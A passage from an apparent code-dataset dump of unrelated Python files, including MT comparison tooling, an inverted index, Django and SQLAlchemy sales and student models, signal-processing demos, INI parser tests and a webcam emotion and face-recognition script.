report_length=10):\n \"\"\"\n Print examples of sentences that satisfy some criterion, usually score of one system better\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n score_type: The type of scorer to use\n report_length: Number of sentences to print for each system being better or worse\n \"\"\"\n scorer = scorers.create_scorer_from_profile(score_type)\n sname = scorer.name()\n scorediff_list = []\n for i, (o1, o2, r) in enumerate(zip(out1, out2, ref)):\n s1, str1 = scorer.score_sentence(r, o1)\n s2, str2 = scorer.score_sentence(r, o2)\n scorediff_list.append((s2-s1, s1, s2, str1, str2, i))\n scorediff_list.sort()\n print(f'--- {report_length} sentences where Sys1>Sys2 at {sname}')\n for bdiff, s1, s2, str1, str2, i in scorediff_list[:report_length]:\n print ('sys2-sys1={}, sys1={}, sys2={}\\nRef: {}\\nSys1: {}\\nSys2: {}\\n'.format(bdiff, s1, s2, ' '.join(ref[i]), ' 
'.join(out1[i]), ' '.join(out2[i])))\n print(f'--- {report_length} sentences where Sys2>Sys1 at {sname}')\n for bdiff, s1, s2, str1, str2, i in scorediff_list[-report_length:]:\n print ('sys2-sys1={}, sys1={}, sys2={}\\nRef: {}\\nSys1: {}\\nSys2: {}\\n'.format(bdiff, s1, s2, ' '.join(ref[i]), ' '.join(out1[i]), ' '.join(out2[i])))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description='Program to compare MT results',\n )\n parser.add_argument('ref_file', type=str,\n help='A path to a correct reference file')\n parser.add_argument('out1_file', type=str,\n help='A path to a system output')\n parser.add_argument('out2_file', type=str,\n help='A path to another system output')\n parser.add_argument('--src_file', type=str, default=None,\n help='A path to the source file')\n parser.add_argument('--compare_scores', type=str, nargs='*',\n default=['score_type=bleu,bootstrap=0', 'score_type=length,bootstrap=0'],\n help=\"\"\"\n Compare scores. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_score_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_word_accuracies', type=str, nargs='*',\n default=['bucket_type=freq'],\n help=\"\"\"\n Compare word accuracies by buckets. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_word_accuracy_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_src_word_accuracies', type=str, nargs='*',\n default=None,\n help=\"\"\"\n Source analysis. Can specify arguments in 'ref_align=file1,out1_align=file2,out2_align=file3,...' format.\n See documentation for 'print_src_word_accuracy_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_sentence_buckets', type=str, nargs='*',\n default=['bucket_type=score,score_measure=sentbleu',\n 'bucket_type=lengthdiff',\n 'bucket_type=length,statistic_type=score,score_measure=bleu'],\n help=\"\"\"\n Compare sentence counts by buckets. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_sentence_buckets_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_ngrams', type=str, nargs='*',\n default=['compare_type=match'],\n help=\"\"\"\n Compare ngrams. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_ngram_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_sentence_examples', type=str, nargs='*',\n default=['score_type=sentbleu'],\n help=\"\"\"\n Compare sentences. Can specify arguments in 'arg1=val1,arg2=val2,...' 
format.\n See documentation for 'print_sentence_examples' to see which arguments are available.\n \"\"\")\n args = parser.parse_args()\n\n ref, out1, out2 = [corpus_utils.load_tokens(x) for x in (args.ref_file, args.out1_file, args.out2_file)]\n src = corpus_utils.load_tokens(args.src_file) if args.src_file else None\n\n # Aggregate scores\n if args.compare_scores:\n print_utils.print_header('Aggregate Scores')\n for profile in args.compare_scores:\n kargs = arg_utils.parse_profile(profile)\n print_score_report(ref, out1, out2, **kargs)\n print()\n\n # Word accuracy analysis\n if args.compare_word_accuracies:\n print_utils.print_header('Word Accuracy Analysis')\n for profile in args.compare_word_accuracies:\n kargs = arg_utils.parse_profile(profile)\n print_word_accuracy_report(ref, out1, out2, **kargs)\n print()\n\n # Source word analysis\n if args.compare_src_word_accuracies:\n print_utils.print_header('Source Word Analysis')\n if not src:\n raise ValueError(\"Must specify the source file when performing source analysis.\")\n for profile in args.compare_src_word_accuracies:\n kargs = arg_utils.parse_profile(profile)\n print_src_word_accuracy_report(src, ref, out1, out2, **kargs)\n print()\n\n # Sentence count analysis\n if args.compare_sentence_buckets:\n print_utils.print_header('Sentence Bucket Analysis')\n for profile in args.compare_sentence_buckets:\n kargs = arg_utils.parse_profile(profile)\n print_sentence_bucketed_report(ref, out1, out2, **kargs)\n print()\n\n # n-gram difference analysis\n if args.compare_ngrams:\n print_utils.print_header('N-gram Difference Analysis')\n for profile in args.compare_ngrams:\n kargs = arg_utils.parse_profile(profile)\n print_ngram_report(ref, out1, out2, **kargs)\n print()\n\n # Sentence example analysis\n if args.compare_sentence_examples:\n print_utils.print_header('Sentence Example Analysis')\n for profile in args.compare_sentence_examples:\n kargs = arg_utils.parse_profile(profile)\n print_sentence_examples(ref, out1, out2, **kargs)\n print()\n","sub_path":"compare_mt.py","file_name":"compare_mt.py","file_ext":"py","file_size_in_byte":18597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53897234","text":"from typing import List, Dict\nfrom bisect import bisect_left\n\nDocId = int\nTerm = str\n\n\nclass Document:\n doc_id: DocId\n tokens: List[Term]\n\n def __init__(self, doc_id: DocId, tokens: List[Term]):\n self.doc_id = doc_id\n self.tokens = tokens\n\n\nclass Postings:\n # In this simple case we deliberately keep both\n # `doc_count` and `postings`\n # in one place\n doc_count: int\n postings: List[DocId]\n\n def __init__(self):\n self.doc_count = 0\n self.postings = []\n\n def __repr__(self):\n return \"Postings(%d, %s)\" % (self.doc_count, str(self.postings))\n\n def append(self, item: DocId):\n self.postings.append(item)\n self.doc_count += 1\n\n\nclass InvertedIndex:\n index: Dict[Term, Postings]\n\n def __init__(self):\n self.index = {}\n\n def add_doc(self, doc: Document):\n for t in doc.tokens:\n if t in self.index:\n p = self.index[t]\n self.insert(doc.doc_id, p)\n else:\n p = Postings()\n p.append(doc.doc_id)\n self.index[t] = p\n\n @staticmethod\n def intersect(p1: List[DocId], p2: List[DocId]) -> List[DocId]:\n result = []\n i = j = 0\n while i < len(p1) and j < len(p2):\n if p1[i] == p2[j]:\n result.append(p1[i])\n i += 1\n j += 1\n elif p1[i] < p2[j]:\n i += 1\n else:\n j += 1\n return result\n\n def intersect_terms(self, terms: List[Term]) -> List[DocId]:\n 
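# Sort terms by ascending doc_count so the rarest term comes first and\n        # every intermediate intersection stays as small as possible.\n        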
t = sorted(terms, key=lambda x: self.index[x].doc_count)\n head, *tail = t\n result = self.index[head].postings\n t = tail\n while t and result:\n head, *tail = t\n result = self.intersect(result, self.index[head].postings)\n t = tail\n return result\n\n @staticmethod\n def insert(item: DocId, postings: Postings):\n idx = bisect_left(postings.postings, item)\n postings.postings.insert(idx, item)\n postings.doc_count += 1\n","sub_path":"code-python/lecture01/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"362782302","text":"# Data-handling layer\nimport xml.etree.ElementTree as ET\ndef indent(elem, level=0):\n i = \"\\n\" + level * \"\\t\"\n # If the element has child nodes\n if len(elem):\n # If the element's text is empty or whitespace only\n if elem.text is None or elem.text.isspace():\n elem.text = i + \"\\t\"\n # If the element's tail has no content\n if elem.tail is None or elem.tail.isspace():\n elem.tail = i\n # The outermost element needs no formatting on its tail\n if level == 0:\n elem.tail = \"\"\n # Apply the same indentation to every child node\n for elem in elem:\n indent(elem, level + 1)\n # After the loop, elem is the last child of the current parent; since every child is followed by a /n+/t indent, the last node's tail = /n+/t\n # Note: after indent(elem, level + 1) returns, we come back to this line; here level is 0, element is the last child node, and i is /n\n # print(elem,repr(i)) # '\\n'\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n # If there are no child nodes\n else:\n if level and (elem.tail is None or elem.tail.isspace()):\n elem.tail = i\n elem.text = elem.text.strip()\n\nclass Operator:\n @staticmethod\n def verify(ID):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.iter('student'):\n if student.get('id') == ID:\n return True\n else:\n pass\n\n @staticmethod\n def get(ID):\n temp = []\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.iter('student'):\n if student.get('id') == ID:\n for item in student:\n temp.append(item.text)\n return temp\n\n @staticmethod\n def delete(ID):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.findall('student'):\n if student.get('id') == ID:\n root.remove(student)\n indent(root)\n tree.write('../data.xml', encoding='utf-8')\n\n @staticmethod\n def increase(ID, time, name, sex, grade):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n student_id = ET.Element('student')\n student_id.set('id', ID)\n stu_time = ET.Element('time')\n stu_time.text = time\n stu_name = ET.Element('name')\n stu_name.text = name\n stu_sex = ET.Element('sex')\n stu_sex.text = sex\n stu_grade = ET.Element('grade')\n stu_grade.text = grade\n root.append(student_id)\n student_id.extend((stu_time, stu_name, stu_sex, stu_grade))\n indent(root)\n tree.write('../data.xml', encoding='UTF-8')\n\n @staticmethod\n def modify(ID, item, comment):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.findall('student'):\n if student.get('id') == ID:\n temp = student.find(item)\n temp.text = comment\n indent(root)\n tree.write('../data.xml', encoding='UTF-8')\n\nif __name__ == '__main__':\n a = Operator()\n results = a.get('001')\n print(results)\n a.modify('002', 'time', '2016')\n a.modify('002', 'grade', '99')\n print(a.verify('002'))\n print(a.get('002'))\n a.increase('003', '2016', '张三', '女', '98')\n a.delete('003')","sub_path":"学生管理系统/model/Operator.py","file_name":"Operator.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126792810","text":"from sqlalchemy.ext.declarative import 
declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Column, Integer, ForeignKey, Table, String, Date, UniqueConstraint\nfrom models.base_model import Base\n\nstudent_subject_links = Table('student_subject', Base.metadata,\n Column('id_student', Integer, ForeignKey('student.id', ondelete=\"CASCADE\")),\n Column('id_subject', Integer, ForeignKey('subject.id', ondelete=\"CASCADE\")),\n UniqueConstraint('id_student', 'id_subject', name='unique_student_subject')\n )\n\n\nclass Student(Base):\n __tablename__ = 'student'\n id = Column(Integer, primary_key=True)\n first_name = Column(String)\n last_name = Column(String)\n sex = Column(String)\n date_of_birth = Column(Date)\n id_group = Column(Integer, ForeignKey('group.id', ondelete=\"CASCADE\"))\n\n def __init__(self, id, first_name, last_name, sex, date_of_birth, id_group):\n self.id = id\n self.first_name = first_name\n self.last_name = last_name\n self.sex = sex\n self.date_of_birth = date_of_birth\n self.id_group = id_group\n\n def __repr__(self):\n return \"<Student(id={}, first_name={}, last_name={}, sex={}, date_of_birth={}, id_group={})>\" \\\n .format(self.id, self.first_name, self.last_name, self.sex, self.date_of_birth, self.id_group)\n","sub_path":"lab3/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245773915","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom io import BytesIO\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nimport json\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom sales.models import Sale_to_customers,Sale_to_customers_detail\nfrom users.models import Users\nfrom sales.serializers import Sale_to_customersSerializers,Sale_to_customers_detailSerializers\nfrom users.serializers import UsersSerializers\nfrom rest_framework import status\nfrom django.db.models import Q\n#from django.core.urlresolvers import resolve\n\n\n\nclass AddSalesOrder(APIView):\n def post(self,request):\n salesDetails = request.data\n serializer=Sale_to_customersSerializers(data=request.data)\n print(serializer)\n if serializer.is_valid():\n serializer.save()\n sales_id=serializer.data['id']\n if \"data_detail\" not in request.data:\n dict = {'message': 'Record inserted successfully ', 'status': True, 'data': {'sales_id':sales_id}}\n else:\n sales_id=serializer.data['id']\n if sales_id:\n for data in request.data['data_detail']:\n data['sales_id']=sales_id\n serializer = Sale_to_customers_detailSerializers(data=data)\n if serializer.is_valid():\n serializer.save()\n dict = {'message': 'Record inserted successfully ', 'status': True, 'data': {'sales_id':data['sales_id']}}\n else:\n dict = {'message': 'Record not updated ', 'status': False, 'data': serializer.errors}\n return Response(dict, status=status.HTTP_200_OK)\n else:\n dict = {'message': 'Record not updated ', 'status': False, 'data': serializer.errors}\n else:\n dict = {'message': 'Record not updated ', 'status': False, 'data': serializer.errors}\n return Response(dict,status=status.HTTP_200_OK)\n\n\nclass getLastdate(APIView):\n def post(self, request):\n distributer_id = request.data['distributer_id']\n t = request.data['type']\n if t== 'distributer':\n check=Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').first()\n if check:\n lastrecord = 
Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').last()\n serializer = Sale_to_customersSerializers(lastrecord)\n else:\n dic = {}\n dict = {'message': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n else:\n #print('else')\n check=Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).first()\n if check:\n lastrecord = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).last()\n serializer = Sale_to_customersSerializers(lastrecord)\n else:\n dic = {}\n dict = {'message': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n\n\n dic ={}\n if serializer.data:\n dic['distributer_id'] = serializer.data['distributer_id']\n dic['id'] = serializer.data['id']\n sid = serializer.data['id']\n dic['start_date'] = serializer.data['start_date']\n dic['end_date'] = serializer.data['end_date']\n dic['image'] = serializer.data['image']\n dic['type'] = serializer.data['type']\n lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id','product_id','catalog_code','qty')\n serializer = Sale_to_customers_detailSerializers(lastrecordsdetail,many=True)\n #print(serializer.data)\n dic['detail'] = serializer.data\n if dic:\n dict = {'message': 'data found', 'status': True, 'data':dic}\n else:\n dict = {'message': 'data not found', 'status': False, 'data': dic}\n else:\n dict = {'message': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n\nclass gethistory(APIView):\n def post(self, request):\n distributer_id=request.data['distributer_id']\n type=request.data['type']\n month=request.data['month']\n year=request.data['year']\n dic={}\n if type == 'distributer':\n salesdetail = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').filter(Q(Q(start_date__year=year) & Q(start_date__month=month)) | (Q(end_date__year=year) & Q(end_date__month=month)))\n else:\n salesdetail = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).filter(Q(Q(start_date__year=year) & Q(start_date__month=month)) | ( Q(end_date__year=year) & Q(end_date__month=month)))\n #print(salesdetail.query)\n serializer = Sale_to_customersSerializers(salesdetail,many=True)\n dic = serializer.data\n if dic:\n dict = {'message': 'data found', 'status': True, 'data': dic}\n else:\n dict = {'message': 'data not found', 'status': False, 'data': dic}\n\n return Response(dict, status=status.HTTP_200_OK)\n\n def get(self, request):\n sid = request.GET[\"id\"]\n #print(sid)\n #lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id', 'product_id','catalog_code', 'qty')\n\n lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid)\n serializer = Sale_to_customers_detailSerializers(lastrecordsdetail, many=True)\n if serializer.data:\n dict = {'message': 'data found', 'status': True, 'data': serializer.data}\n else:\n dict = {'message': 'data not found', 'status': False, 'data': serializer.data}\n return Response(dict, status=status.HTTP_200_OK)\n\n\nclass getsalespdf(APIView):\n def get(self,request, *args, **kwargs):\n sid = request.GET[\"sales_id\"]\n salesrecords = Sale_to_customers.objects.filter(id=sid)\n serializer = Sale_to_customersSerializers(salesrecords,many=True)\n dic = {}\n dic1 = serializer.data[0]\n distributer_id = 
dic1['distributer_id']\n #print(distributer_id)\n users = Users.objects.filter(id=distributer_id)\n serializer = UsersSerializers(users,many=True)\n customer_name = serializer.data[0]['customer_name']\n\n salesrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id', 'product_id','catalog_code', 'qty')\n serializer = Sale_to_customers_detailSerializers(salesrecordsdetail, many=True)\n\n dic2 = serializer.data\n data = {}\n data['sales']=dic1\n data['salesdetail'] = dic2\n data['distributer_name'] = customer_name\n ''' Create pdf and save'''\n filename = 'sales_'+sid+'.pdf'\n template = get_template('sales.html')\n html = template.render(data)\n result = BytesIO()\n file = open(\"uploadimages/pdf/\"+filename, \"w+b\")\n #current_url = request.path_info\n #print(current_url)\n pisaStatus = pisa.CreatePDF(html.encode('utf-8'), dest=file, encoding='utf-8')\n dict = {'message': 'data found', 'status': True, 'data': 'uploadimages/pdf/'+filename }\n return Response(dict, status=status.HTTP_200_OK)\n","sub_path":"dj_safedecor/safedecor/sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330620849","text":"import nibabel as nib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimg = nib.load('ds114_sub009_t2r1.nii')\ndata = img.get_data()\nstdVals = []\nJ = data.shape[3]\nfor i in range(1, J):\n\tcurr_vol = data[:,:,:,i]\n\tcurr_stdVal = np.std(curr_vol)\n\tstdVals.append(curr_stdVal)\n","sub_path":"std_test.py","file_name":"std_test.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208259096","text":"import sqlalchemy as sa\n\nfrom .base import metadata\n\nprojects_snapshots = sa.Table(\n \"projects_snapshots\",\n metadata,\n sa.Column(\n \"id\",\n sa.BigInteger,\n nullable=False,\n primary_key=True,\n doc=\"Global snapshot identifier index\",\n ),\n sa.Column(\"name\", sa.String, nullable=False, doc=\"Display name\"),\n sa.Column(\n \"created_at\",\n sa.DateTime(),\n nullable=False,\n doc=\"Timestamp for this snapshot.\"\n \"It corresponds to the last_change_date of the parent project \"\n \"at the time the snapshot was taken.\",\n ),\n sa.Column(\n \"parent_uuid\",\n sa.String,\n sa.ForeignKey(\n \"projects.uuid\",\n name=\"fk_snapshots_parent_uuid_projects\",\n ondelete=\"CASCADE\",\n ),\n nullable=False,\n unique=False,\n doc=\"UUID of the parent project\",\n ),\n sa.Column(\n \"project_uuid\",\n sa.String,\n sa.ForeignKey(\n \"projects.uuid\",\n name=\"fk_snapshots_project_uuid_projects\",\n ondelete=\"CASCADE\",\n ),\n nullable=False,\n unique=True,\n doc=\"UUID of the project associated to this snapshot\",\n ),\n sa.Column(\"deleted\", sa.Boolean(), default=False),\n sa.UniqueConstraint(\n \"parent_uuid\", \"created_at\", name=\"snapshot_from_project_uniqueness\"\n ),\n)\n","sub_path":"packages/postgres-database/src/simcore_postgres_database/models/projects_snapshots.py","file_name":"projects_snapshots.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39807215","text":"import kero.multib.NeuralNetwork as nn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nAF = nn.activationFunction(func = \"Sigmoid\")\nx = np.linspace(-4,4,100)\ny = [AF.af(X) for X in x]\ndydx = [AF.afp(X) for X in x]\n\nfig1 = 
plt.figure()\nax=fig1.add_subplot(111)\nax.scatter(x,y,3,label=\"sigmoid\")\nax.scatter(x,dydx,3,label=\"sigmoid derivative\")\nax.legend()\nplt.show()","sub_path":"test runs/0.6.1 tests/testActf1.py","file_name":"testActf1.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"520068331","text":"\"\"\"\nTwo natural numbers a, b (each at most 10000) -> greatest common divisor, least common multiple\nGCD <- GCD(a, b)\nLCM <- a * b / GCD(a, b)\n\ngcd: Euclidean algorithm\n\"\"\"\n\nimport sys\nreadline = lambda: sys.stdin.readline().rstrip()\n\ndef gcd(a, b):\n if b == 0:\n return a\n\n else:\n if b > a:\n a, b = b, a\n \n return gcd(b, a % b)\n\n\ndef lcm(a, b):\n return int(a * b / gcd(a, b))\n\n\nif __name__ == '__main__':\n a, b = map(int, readline().split())\n print(gcd(a, b))\n print(lcm(a, b))","sub_path":"baekjoonOJ/2609/2609.py","file_name":"2609.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"495736544","text":"#!/usr/bin/env python3\n\ncat_matrices2D = __import__('7-gettin_cozy').cat_matrices2D\nimport numpy as np \n\ndef cat_matrices2D(mat1, mat2, axis=0):\n if (len(mat1[0]) == len(mat2[0])) and axis == 0:\n new_mat=np.concatenate((mat1,mat2),axis=0)\n return new_mat.tolist()\n elif (len(mat1) == len(mat2)) and axis == 1:\n new_mat=np.concatenate((mat1,mat2),axis=1)\n return new_mat.tolist()\n else:\n return None\nmat1 = [[1, 2], [3, 4]]\nmat2 = [[5, 6]]\nmat3 = [[7], [8]]\nmat4 = cat_matrices2D(mat1, mat2)\nmat5 = cat_matrices2D(mat1, mat3, axis=1)\nprint(mat4)\nprint(mat5)\nmat1[0] = [9, 10]\nmat1[1].append(5)\nprint(mat1)\nprint(mat4)\nprint(mat5)","sub_path":"7-gettin_cozy.py","file_name":"7-gettin_cozy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"69963176","text":"\"\"\"\nContinuous wavelet transform.\n\nPerforms a continuous wavelet transform on data, using the wavelet function. 
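The output is a 2-D array with one row per width and one column per input sample.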
\nA CWT performs a convolution with data using the wavelet function, which is \ncharacterized by a width parameter and length parameter.\n\"\"\"\n\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(-1, 1, 200, endpoint=False)\nsig = np.cos(2 * np.pi * 7 * t) + signal.gausspulse(t - 0.4, fc=2)\nwidths = np.arange(1, 31)\ncwtmatr = signal.cwt(sig, signal.ricker, widths)\nplt.imshow(cwtmatr, extent=[-1, 1, 31, 1], cmap='PRGn', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.show()","sub_path":"signal_processing/wavelets/continuous_wavelet_transform.py","file_name":"continuous_wavelet_transform.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"65296139","text":"from models import Member, Post\nimport stores\n\n\nmember1 = Member(\"Ahmad\", 23)\n\nmember2 = Member(\"Samer\", 29)\n\nm_store = stores.MemberStore()\n\nm_store.add(member1)\n\nm_store.add(member2)\n\npost1 = Post(\"Post1\", \"This is the first post\")\n\npost2 = Post(\"Post2\", \"This is the second post\")\n\npost3 = Post(\"Post3\", \"This is the third post\")\n\np_store = stores.PostStore()\n\np_store.add(post1)\n\np_store.add(post2)\n\np_store.add(post3)\n\n\nprint(\"***** Forum Summary *****\")\n\nprint(\"\\n***** Members *****\\n\")\n\nfor member in m_store.get_all():\n\n print(member)\n\nprint(\"\\n***** Posts *****\\n\")\n\nfor post in p_store.get_all():\n\n print(post)\n\nprint(m_store.entity_exists(member1))\n\nprint(p_store.entity_exists(post3))\n\nprint(m_store.entity_exists(Member(\"test\", \"0\")))\n\nm_store.delete(10)\n\np_store.delete(2)\n\nprint(\"\\n***** Posts *****\\n\")\n\nfor post in p_store.get_all():\n\n print(post)","sub_path":"Forums/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"611584855","text":"import edms.iniformat.reader\nimport edms.iniformat.writer\nimport unittest\nimport os\n\nclass TestIniFileWriter(unittest.TestCase):\n def setUp(self):\n self.write_path = 'writesample1.ini'\n try:\n os.remove(self.write_path)\n except OSError:\n pass\n self.sample1_dict = {'first_section':\n {'coffee':'even more love',\n 'beer':'funny things can happen',\n 'currently_working_on_the_project':'true'\n },\n 'second_section':\n {'parameter': 'on',\n 'rabbit': 'animal',\n 'my_path':'tmp/edms/samples'\n }\n }\n\n\n def tearDown(self):\n os.remove(self.write_path)\n\n def test_writing_dict_to_ini_file(self):\n edms.iniformat.writer.write_ini_file(self.write_path, self.sample1_dict)\n self.assertEquals(edms.iniformat.reader.read_ini_file(self.write_path), self.sample1_dict)\n\n\n\nclass TestIniFileReader(unittest.TestCase):\n def setUp(self):\n self.sample1_dict = {'first_section':\n {'coffee':'love',\n 'beer':'fun',\n 'currently_working_on_the_project':'true'\n },\n 'second_section':\n {'parameter': 'off',\n 'rabbit': 'animal',\n 'my_path':'tmp/edms/samples'\n }\n }\n\n def test_reading_sample1(self):\n self.assertEquals(edms.iniformat.reader.read_ini_file('sample1.ini'), self.sample1_dict)\n\n def test_reading_invalid_sample2(self):\n with self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample2.ini')\n\n def test_duplicate_section_name(self):\n with self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample3.ini')\n\n def test_duplicate_property_name(self):\n with 
self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample4.ini')","sub_path":"edms/tests/test_iniformat.py","file_name":"test_iniformat.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"240986169","text":"from keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport numpy as np\nimport face_recognition\nimport dlib\nfrom imutils import face_utils\n\n####### Initialize faces for facial recognition #######\nimgSam = face_recognition.load_image_file('faces/Sam.png')\nimgSamEncoding = face_recognition.face_encodings(imgSam)[0]\n\nimgTrev = face_recognition.load_image_file('faces/Trev.png')\nimgTrevEncoding = face_recognition.face_encodings(imgTrev)[0]\n\nimgNabil = face_recognition.load_image_file('faces/Nabil.png')\nimgNabilEncoding = face_recognition.face_encodings(imgNabil)[0]\n\nimgSunghoRoh = face_recognition.load_image_file('faces/Sungho_Roh.png')\nimgSunghoRohEncoding = face_recognition.face_encodings(imgSunghoRoh)[0]\n\nimgPark = face_recognition.load_image_file('faces/Park.png')\nimgParkEncoding = face_recognition.face_encodings(imgPark)[0]\n\nimgAntonio = face_recognition.load_image_file('faces/Antonio.png')\nimgAntonioEncoding = face_recognition.face_encodings(imgAntonio)[0]\n\nimgKim = face_recognition.load_image_file('faces/Kim.png')\nimgKimEncoding = face_recognition.face_encodings(imgKim)[0]\n\nimgLee = face_recognition.load_image_file('faces/Lee.png')\nimgLeeEncoding = face_recognition.face_encodings(imgLee)[0]\n\n# Keep the encodings and names index-aligned; the original lists were\n# mismatched (7 names for 6 encodings, with Trev and Lee unused).\nlearnedFaceEncodings = [imgSamEncoding, imgTrevEncoding, imgNabilEncoding, imgSunghoRohEncoding, imgParkEncoding,\n imgAntonioEncoding, imgKimEncoding, imgLeeEncoding]\nlearnedFaceNames = ['Sam', 'Trevor', 'Nabil', 'Sungho Roh', 'Park', 'Antonio', 'Kim', 'Lee']\n# End face initialization\n\n# set local or full pathname for the haarcascades and vgg.h5 files\nface_classifier = cv2.CascadeClassifier(\n '/Users/samlindaman/PycharmProjects/Emotion/haarcascade_frontalface_default.xml')\nclassifier = load_model('/Users/samlindaman/PycharmProjects/Emotion/Emotion_little_vgg.h5')\n\nclass_labels = ['Angry', 'Happy', 'Neutral', 'Sad', 'Surprise']\ncap = cv2.VideoCapture(0)\n\n# set variable for falling check\narrHeights = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ncount = 0\nfallenText = \"FALLEN\"\nfallen = False\n#\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfont2 = cv2.QT_FONT_NORMAL\nexitText = 'Press \"q\" to exit.'\n\nwhile True:\n # Grab a single frame of video\n ret, frame = cap.read()\n labels = []\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n face_locations = face_recognition.face_locations(frame)\n face_encodings = face_recognition.face_encodings(frame, face_locations)\n\n for (x, y, w, h) in faces:\n\n # Falling check\n arrHeights.append(y) # append array of y coordinates for each face\n size = len(arrHeights)\n\n # loop through the last 10 y coordinates to check for a downward trend\n for s in range(size - 11, size - 1):\n if arrHeights[s] > arrHeights[s - 1]:\n count = count + 1\n else:\n count = 0\n fallen = False\n # if user comes back into screen, the fallen message should disappear\n\n # make sure that the fall is large/fast enough and the user wasn't just moving their head downward\n if count >= 6 and arrHeights[s] - arrHeights[s - 5] >= 175:\n fallen = True\n break\n\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n matches = 
